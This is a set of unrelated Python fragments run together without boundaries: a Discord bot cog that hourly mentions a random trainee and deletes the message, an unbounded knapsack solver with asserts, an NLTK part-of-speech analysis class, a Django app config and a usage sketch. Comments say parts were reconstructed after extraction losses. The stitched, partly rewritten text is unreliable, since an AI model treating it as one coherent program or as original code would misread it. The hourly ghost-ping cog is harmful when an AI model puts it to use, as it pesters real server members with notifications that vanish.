            description="enabled" if self.enabled else "disabled"))
        self.ping_trainees.cancel()
        await asyncio.sleep(5)
        self.ping_trainees.start()

    @tasks.loop(hours=1)
    async def ping_trainees(self):
        role = self.bot.get_guild(self.guild).get_role(self.role)
        channel = self.bot.get_guild(self.guild).get_channel(self.channel)
        if self.enabled:
            target = random.choice([trainee.mention for trainee in role.members])
            msg = await channel.send(target + ' lol')
            await msg.delete()

    async def cog_check(self, ctx):
        return ctx.guild.id == 681882711945641997


def setup(bot):
    bot.add_cog(Trainee(bot))


algorithms/0019-Knapsack/knapsack.py1-10
# Solution was based on this really nice explanation from @dcvrn:
# https://www.hackerrank.com/challenges/unbounded-knapsack/forum/comments/87616

# Set this to True to enable debugging.
DEBUG = False


def unboundedKnapsack(targetSum, values, calculated=None):
    # calculated is initialized as None, instead of as {}, because of the way
    # Python treats default arguments: https://docs.python-guide.org/writing/gotchas/
    # In summary, the calculated dict would be kept across different function
    # calls, and the result for a second list (see the unit tests) would be
    # wrongly inferred from the first call.
    if not calculated:
        calculated = {}

    if DEBUG:
        print("targetSum: %s" % targetSum)
        print("values: %s" % values)
        print("calculated: %s" % calculated)

    if targetSum in calculated:
        return calculated[targetSum]

    # Sort the values first, so we don't need to iterate through the whole list
    # on every execution.
    sorted_values = sorted(values)

    for slot in range(1, targetSum + 1):
        calculated[slot] = 0
        for i in range(0, len(sorted_values)):
            value = sorted_values[i]
            if value == slot:
                calculated[slot] = value
                break
            elif value < slot:
                rest = slot - value
                result = value + unboundedKnapsack(rest, sorted_values, calculated)
                if result > calculated[slot]:
                    calculated[slot] = result
            else:
                break

    if DEBUG:
        print("calculated before return: %s" % calculated)
        print("targetSum: %s, calculated[%s]: %s" % (targetSum, targetSum, calculated[targetSum]))

    return calculated[targetSum]
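# Quick sanity checks for unboundedKnapsack. The cases below are illustrative,
# not the original repo's unit tests. Each item can be reused any number of
# times and its weight equals its value, so we maximise the total without
# exceeding targetSum.
assert unboundedKnapsack(12, [1, 6, 9]) == 12  # twelve 1s (or two 6s) fill it exactly
assert unboundedKnapsack(9, [3, 4, 8]) == 9    # three 3s
assert unboundedKnapsack(11, [3, 7]) == 10     # 3 + 7; 11 itself is unreachable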
"""The core of the manuscript analysis."""
import logging
from io import StringIO

from nltk import pos_tag
from nltk.tokenize import word_tokenize

logging.basicConfig(
    format='%(asctime)s %(levelname)s [%(filename)s:%(lineno)s - %(funcName)s()] %(message)s',
    level=logging.DEBUG
)

ADJECTIVES = frozenset({'JJ', 'JJR', 'JJS'})
ADVERBS = frozenset({'RB', 'RBR', 'RBS', 'WRB'})
NOUNS = frozenset({'NN', 'NNS', 'NNP', 'NNPS'})
PRONOUNS = frozenset({'PRP', 'PRP$', 'WP', 'WP$'})
VERBS = frozenset({'VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ'})
CONJUNCTIONS = frozenset({'CC'})
DETERMINERS = frozenset({'DT', 'PDT', 'WDT'})
PREPOSITIONS = frozenset({'IN'})
PARTICLES = frozenset({'RP'})
INTERJECTIONS = frozenset({'UH'})
NUMBERS = frozenset({'CD'})
FOREIGN_WORDS = frozenset({'FW'})

ADS = ADJECTIVES | ADVERBS
POS_TAGS = (
    ADJECTIVES | ADVERBS | NOUNS | PRONOUNS | VERBS | CONJUNCTIONS | DETERMINERS
    | PREPOSITIONS | PARTICLES | INTERJECTIONS | NUMBERS | FOREIGN_WORDS
)


class Analysis(object):
    def __init__(self, submitted: str):
        self.submitted = submitted
        self._tokens = None
        self._tags = None
        self._token_count = None

    @property
    def tokens(self) -> list:
        if self._tokens is None:
            self._tokens = word_tokenize(self.submitted)
        return self._tokens

    @property
    def tags(self) -> list:
        if self._tags is None:
            self._tags = pos_tag(self.tokens)
        return self._tags

    @property
    def token_count(self) -> int:
        if self._token_count is None:
            self._token_count = len([tag for tag in self.tags if tag[0] != tag[1]])
        return self._token_count

    @property
    def char_count(self) -> int:
        return len(self.submitted)

    def recombine(self, show_ads: bool = False, show_pos: bool = False) -> str:
        with StringIO() as sfd:
            index = 0
            for tnum, token in enumerate(self.tokens):
                if token in ['``', "''"]:
                    # Refer https://stackoverflow.com/a/32197336.
                    token = '"'
                while True:
                    if index >= self.char_count:
                        # logging.debug('Index: %s, token: "%s"', index, token)
                        logging.error('Something went wrong. Index: %s, char_count: %s.',
                                      index, self.char_count)
                        break
                    elif token.startswith(self.submitted[index]):
                        if (show_pos and self.tags[tnum][1] in POS_TAGS) or (show_ads and self.tags[tnum][1] in ADS):
                            # Annotate the token with its POS tag. The original
                            # markup was lost in extraction; "token/TAG" is used
                            # here as a plain-text stand-in.
                            sfd.write('{}/{}'.format(token, self.tags[tnum][1]))
                        else:
                            sfd.write(token)
                        index += len(token)
                        break
                    else:
                        # Pass through characters that are not part of the current
                        # token (whitespace, punctuation the tokenizer dropped, etc.).
                        # The original replacement string for '\n' was garbled in
                        # extraction, so newlines are simply passed through here.
                        sfd.write(self.submitted[index])
                        index += 1
            sfd.write(self.submitted[index:])
            return sfd.getvalue()


from django.apps import AppConfig


class ProtecsysConfig(AppConfig):
    name = 'protecsys'
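# A quick usage sketch for the Analysis class defined above. The sentence is
# made up, and NLTK's 'punkt' and 'averaged_perceptron_tagger' resources must
# already be downloaded for word_tokenize/pos_tag to work.
sample = Analysis("The quick brown fox jumps over the lazy dog.")
print(sample.token_count)               # number of recognised tokens
print(sample.recombine(show_ads=True))  # adjectives/adverbs annotated with their tags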